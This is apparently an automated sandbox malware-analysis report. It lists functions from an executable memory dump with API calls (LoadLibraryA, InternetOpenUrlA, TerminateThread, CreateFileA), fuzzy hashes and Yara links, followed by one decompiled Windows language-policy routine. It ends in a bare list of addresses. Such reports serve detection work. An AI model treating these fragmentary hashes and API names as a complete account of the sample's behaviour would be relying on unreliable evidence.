Opcode Fuzzy Hash: f23a2b8016fcc4a7bc7ccae8cd51ba67e9acf57d701327584bf0756a4f04441e
Instruction Fuzzy Hash: 73112970204301AFEB254E59CDD6BEA3755AF1A364F21C2AAED52C71E7D734C880D622

Uniqueness

Uniqueness Score: -1.00%

Function 001B778B, Relevance: 1.6, APIs: 1, Instructions: 141libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 558b7df33be809b2af0f1f12938a12d7bb03b9156864e029fa9bcae9d6c65a84
Instruction ID: b5f5afda326dec30d96cc0cd3a2f3458e122ad9f8b4609ad631bec7070f70e09
Opcode Fuzzy Hash: 558b7df33be809b2af0f1f12938a12d7bb03b9156864e029fa9bcae9d6c65a84
Instruction Fuzzy Hash: 2C412C2420C206DFCB2C76A4C9A07FA16519FF5760FB7456BFC83972C5D7188886E653

Uniqueness

Uniqueness Score: -1.00%

Function 001B7A76, Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 924b87ec75ad6cb4a43525f6081352f64d32fd6397d82dccb90488b6fc7ddb1c
Instruction ID: 2817d966cfd8b745d50c9887069d54c4557585f1f8723f48d3f8021403c6285d
Opcode Fuzzy Hash: 924b87ec75ad6cb4a43525f6081352f64d32fd6397d82dccb90488b6fc7ddb1c
Instruction Fuzzy Hash: B321296420C106DECA2C75A4C9A0BFA16508FF5761FB2452FFCC3961C6DB28C8866653

Uniqueness

Uniqueness Score: -1.00%

Function 001B9576, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 63ec0d3f920d43b61a665c304fe7d6865b6e14c9eae1820d2255f3f22cca32d1
Instruction ID: 6797dd56e5748d95779d9dcb789ca8323e8bc2fc2db549acd74a09df82dd9fb2
Opcode Fuzzy Hash: 63ec0d3f920d43b61a665c304fe7d6865b6e14c9eae1820d2255f3f22cca32d1
Instruction Fuzzy Hash: B0312D54908355DEDF38AE649C90BF967519F32320F75C26BEA97890CAC76888839723

Uniqueness

Uniqueness Score: -1.00%

Function 001B4FFC, Relevance: 1.6, APIs: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B513A

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: e378cc0c9a5ff8fcc6433da86e053291435c6d37a7fe6b5fd8917831b836245e
Instruction ID: 07a4a2c7360595164ed834d5d897ae9f22c30adf0c8860e13d60702f8659fb5f
Opcode Fuzzy Hash: e378cc0c9a5ff8fcc6433da86e053291435c6d37a7fe6b5fd8917831b836245e
Instruction Fuzzy Hash: DE310030280B47DEEB345F54CE80BEE32AAAF057C0F644028ED8AD9584EB71D845EB10

Uniqueness

Uniqueness Score: -1.00%

Function 001B5053, Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B513A

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: d5fd02f846d81cf370db57ad73bdab0fba0a5ff8794194e6766a9f12780b3218
Instruction ID: 0121064ae76b011f5082678ef3b92ec52238263b61f8fe5c9149818a644ea39d
Opcode Fuzzy Hash: d5fd02f846d81cf370db57ad73bdab0fba0a5ff8794194e6766a9f12780b3218
Instruction Fuzzy Hash: E1210120284B83DEEB345F68DD50BEE37AAAF12780F644228ED86DA0C4EB31D805D710

Uniqueness

Uniqueness Score: -1.00%

Function 001B3433, Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 001B346D

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a66b83617689dbe6279f7cc2e4cd1988b850d02b935140634bc0df6ace5892f5
Instruction ID: fcd3bfdfd086f213601d99899e1725d3563012d7aea7c033cce2efe1e26a2fe5
Opcode Fuzzy Hash: a66b83617689dbe6279f7cc2e4cd1988b850d02b935140634bc0df6ace5892f5
Instruction Fuzzy Hash: 53212630204701AFEB255EA9C995BEE3798AF1B7A4F218364ED92CB0DBDB74C841C511

Uniqueness

Uniqueness Score: -1.00%

Function 001B50AD, Relevance: 1.6, APIs: 1, Instructions: 76networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B513A

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 243bc48c06897341f926ab4efb95068490f03d5f052ff06976fe7dbcdc2ad5d9
Instruction ID: 4dcc9e40f217aa6a2ad5add7df0291ee0f82c92050bf74fbbc65cc5fea2f1e62
Opcode Fuzzy Hash: 243bc48c06897341f926ab4efb95068490f03d5f052ff06976fe7dbcdc2ad5d9
Instruction Fuzzy Hash: A621F230280B47DEEB349F59DE80BEE33A6AF15BC0F544528ED8AD9484EB71D805DA10

Uniqueness

Uniqueness Score: -1.00%

Function 001B341A, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 001B346D

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 4cda4815f080e3731620244d6378e6d0c0990ca7912d23a36631e8da06efaf25
Instruction ID: b9d6f7bffc023e7456dc79d2c4b49a606bf4be711c5d35867180917f4538ceb0
Opcode Fuzzy Hash: 4cda4815f080e3731620244d6378e6d0c0990ca7912d23a36631e8da06efaf25
Instruction Fuzzy Hash: ED110B30204701AFEB294E59C9D6BE93755AF1A364F31C2A5ED52C71E7E774C840D522

Uniqueness

Uniqueness Score: -1.00%

Function 001B8EF8, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cbee21c7250ec1fac37e2de997d9ddf22dc05851b5fde3db718d29aa983f06e5
Instruction ID: baacafd37f0a627d75bdd734bfa9ce16c86b853bc1cf7c88ecbf30b5326b58da
Opcode Fuzzy Hash: cbee21c7250ec1fac37e2de997d9ddf22dc05851b5fde3db718d29aa983f06e5
Instruction Fuzzy Hash: A8110258648118EAEE38B9A4DC61BFD020A9F71764FB1492BF897860D5CB2DC8859713

Uniqueness

Uniqueness Score: -1.00%

Function 001B5103, Relevance: 1.6, APIs: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B513A

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 0c9cf7e07635385ef6446946bc9c685db42702b1ae3c41e18ede7db49e09fd4e
Instruction ID: 02dc1169db0e5713420f5ebc321aa2b380192731510a94e0a07ef3392e210da1
Opcode Fuzzy Hash: 0c9cf7e07635385ef6446946bc9c685db42702b1ae3c41e18ede7db49e09fd4e
Instruction Fuzzy Hash: 3B11B230180B87CEEB349F59DE80BEE37A6AF157C0F544528EC89DA544EB71D905DB20

Uniqueness

Uniqueness Score: -1.00%

Function 001B6D2B, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 80d4cce1a3c4e955cdd796a94773929c534644cd19cb48d532b429aef1db7063
Instruction ID: a4c19aa98efa105db4c58c069996f000718fd2c08aa9a8ea7c933c1ad7ac2437
Opcode Fuzzy Hash: 80d4cce1a3c4e955cdd796a94773929c534644cd19cb48d532b429aef1db7063
Instruction Fuzzy Hash: 0C01C0585986119DDF34BEE8E950BFD12948F32B40FA18A2AF8D5C80C9DB2CC4468706

Uniqueness

Uniqueness Score: -1.00%

Function 001B7DF9, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab934d08007409289f992849c9cf762f63bc6bb1326aff5bd4c6899f122daed2
Instruction ID: 75ac8a1199667b2519da0d7b4969ba68164199bc728bc2f83436d0b2ea4de428
Opcode Fuzzy Hash: ab934d08007409289f992849c9cf762f63bc6bb1326aff5bd4c6899f122daed2
Instruction Fuzzy Hash: 1E018B8860C115EADE38BAA4EC60BFE15548F75764FB289ABF887850C9C71DC8896313

Uniqueness

Uniqueness Score: -1.00%

Function 001B6D67, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f7e446ccf18e7af093180ddac4bf7e3f67c0d99cfa0daeb177c4319de9e48c2
Instruction ID: 5829034f7a6ae4c05b0d6bacb6e1d21bfd35b42d1ab82231bdbd85cb153c1ff0
Opcode Fuzzy Hash: 6f7e446ccf18e7af093180ddac4bf7e3f67c0d99cfa0daeb177c4319de9e48c2
Instruction Fuzzy Hash: 8301DE585886109ECB247EA4E8A07FC22A44F32B40FA14A67F896C90C9DB2CD04A8706

Uniqueness

Uniqueness Score: -1.00%

Function 001B43F6, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7b1995c5eebd416e5442111ce1f55ed9a7979d9f55a7b6cb84594f1df1c8b568
Instruction ID: c767409746399bf13ba1880907fe29eda9d11b1b9ddc40581c701b0185f16d92
Opcode Fuzzy Hash: 7b1995c5eebd416e5442111ce1f55ed9a7979d9f55a7b6cb84594f1df1c8b568
Instruction Fuzzy Hash: AB01F958608015EADE34BAA4DC61BFD12154F71764FB18A37F897950C5C76CC4895713

Uniqueness

Uniqueness Score: -1.00%

Function 001B6DDF, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2b3624d91bf258f058948e668ab837597f0591dfc0601aa43fb318a1d4a4f35e
Instruction ID: 19eb2695dd1257594ffd7bde78110a8dedc599ea35985470e0a5de3d3d146a21
Opcode Fuzzy Hash: 2b3624d91bf258f058948e668ab837597f0591dfc0601aa43fb318a1d4a4f35e
Instruction Fuzzy Hash: A1F0281C584315DECF207EA4E960BFD23948F32B40FA14626FCD4D8088DB7CC0468706

Uniqueness

Uniqueness Score: -1.00%

Function 001B6D28, Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92fb54bb7dc3af0216f1f5a59ee4455885171ab92b850a80361732687b20ea89
Instruction ID: d4ca48bcf1ed90724203a85046e0df69fcc1b35b7409374806453227ea56f534
Opcode Fuzzy Hash: 92fb54bb7dc3af0216f1f5a59ee4455885171ab92b850a80361732687b20ea89
Instruction Fuzzy Hash: 80F0904C508015EADE38BAA4DC61BFD41148F70754FB1893BF896810C9CB2CC48A6713

Uniqueness

Uniqueness Score: -1.00%

Function 001B6E25, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab1ef022b958204ffeeeb15f2705bdd26c5bdab40931283fb2d2200fcc883025
Instruction ID: 13a5b049db4ee6381bb08669be336d34e4b6b8e63d6f7fff88d42bf994f31304
Opcode Fuzzy Hash: ab1ef022b958204ffeeeb15f2705bdd26c5bdab40931283fb2d2200fcc883025
Instruction Fuzzy Hash: 49F0BE1D6986219ADE242EE5E5507ED12944F36F80FA58626FCD4D8088DF3CC0468706

Uniqueness

Uniqueness Score: -1.00%

Function 001B6EDF, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5ce6bf67c1bdd49c1ccb3e0ccf272f1942cf60834a44e427e572a637bd50b00c
Instruction ID: 8dfb7827118a68fecaaa79690e122e066781921e5b28df8b2d2f6ccc79477b7d
Opcode Fuzzy Hash: 5ce6bf67c1bdd49c1ccb3e0ccf272f1942cf60834a44e427e572a637bd50b00c
Instruction Fuzzy Hash: 7DF0902A5D0F214CDF202FEAE24438D26D89F17E80B994754A9D4DC08CEF78D016CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 001B6DC7, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1f12e7682954ae3d25e68b7e87ba518c34d8ac3ff6017ff08e94bc4a4acc81f4
Instruction ID: 315036165bb76907abd1f23b3af68cbf3fdcfb7fdbfa4650fe6e5fbec0a086ea
Opcode Fuzzy Hash: 1f12e7682954ae3d25e68b7e87ba518c34d8ac3ff6017ff08e94bc4a4acc81f4
Instruction Fuzzy Hash: E4F08C58508114EACF24BEA4DCA1BFD12604F30758FA14A3BF8969508AC76CC4899753

Uniqueness

Uniqueness Score: -1.00%

Function 001B6E5F, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 63ba373427eae086e3056d7c1adadfa8fb28ff9a0e4e9677f5779052289bf0b4
Instruction ID: 3914aba0fdc99b1e87db25f76253f23db1bd88b0a6c7c480516fd5ecc14bfd2f
Opcode Fuzzy Hash: 63ba373427eae086e3056d7c1adadfa8fb28ff9a0e4e9677f5779052289bf0b4
Instruction Fuzzy Hash: 68F08C59598A218ACF243EE5F5543ED16949F26F40BE58216FCD4DC08CEF7CC0078B4A

Uniqueness

Uniqueness Score: -1.00%

Function 001B6E9F, Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,001B9078,001B3991,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001B6F3F

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 227f19657b698463172f2813b6856cb1a32c8b29d31f5d91332ddc7b85ac5ca8
Instruction ID: 3d5a79173cd46b3790d6be29123ceb60dd568cf0655e180eb749f5b8957399d4
Opcode Fuzzy Hash: 227f19657b698463172f2813b6856cb1a32c8b29d31f5d91332ddc7b85ac5ca8
Instruction Fuzzy Hash: 90F0A029194B218ECF203FE9E5807DC27A09B26F40BA58229F8D4C808CDB7C9002CB46

Uniqueness

Uniqueness Score: -1.00%

Function 001B4A20, Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,001B497C,001B4A7D), ref: 001B4A5D

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bdd6c79a8f2bc19b4450c1005397142b959b60c774b670b4e01ca7ed20c4c8b1
Instruction ID: d632e12828c98f742c6d9001d3c627f4b5491bb05ee5e00f3d8867d2bdc30d0d
Opcode Fuzzy Hash: bdd6c79a8f2bc19b4450c1005397142b959b60c774b670b4e01ca7ed20c4c8b1
Instruction Fuzzy Hash: 36E08C6A9E0F128CEA241EE2E3097CF128A4F13EC0F9842006EC8DC088BF688026C509

Uniqueness

Uniqueness Score: -1.00%

Function 001B4A0E, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,001B497C,001B4A7D), ref: 001B4A5D

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bef5c83e52e613ab61bc299e222d151747a85b2ce628e27e2b2488f39355c5f1
Instruction ID: 6b3bf41db7e8be3774b23025b0ce733fc2a88d77997231ebbcd382356b3b53c7
Opcode Fuzzy Hash: bef5c83e52e613ab61bc299e222d151747a85b2ce628e27e2b2488f39355c5f1
Instruction Fuzzy Hash: 33D0C9707D8305FAF6244560AE2BFDA62495F82B50F014109BF4E2A0C3A7E20654D616

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1EB48788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1EB48788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E1EB48460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E1EB2E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E1EB4718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E1EB48460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E1EB4718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E1EB48460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E1EB48460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E1EB48460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E1EB4718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E1EB2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E1EB22340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E1EB3E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E1EB2E2A8(_t322,  &_v68, _v16);
								if(E1EB45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E1EB3E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E1EB2E2A8(_t322,  &_v68, _t236);
								if(E1EB45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E1EB4718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E1EB2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E1EB22340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E1EB3E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E1EB2E2A8(_v12,  &_v68, _v16);
							if(E1EB45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E1EB3E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E1EB2E2A8(_t322,  &_v68, _t269);
							if(E1EB45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E1EB4718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E1EB2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E1EB22340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E1EB3E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E1EB2E2A8(_v12,  &_v68, _v16);
						if(E1EB45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E1EB3E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E1EB2E2A8(_t322,  &_v68, _t296);
						if(E1EB45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E1EB2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x1eb48788
0x1eb48788
0x1eb48791
0x1eb48794
0x1eb48798
0x1eb4879b
0x1eb4879e
0x1eb487a1
0x1eb487a4
0x1eb487a7
0x1eb487aa
0x1eb487af
0x1eb91ad3
0x1eb48b0a
0x1eb48b0d
0x1eb48b13
0x1eb48b19
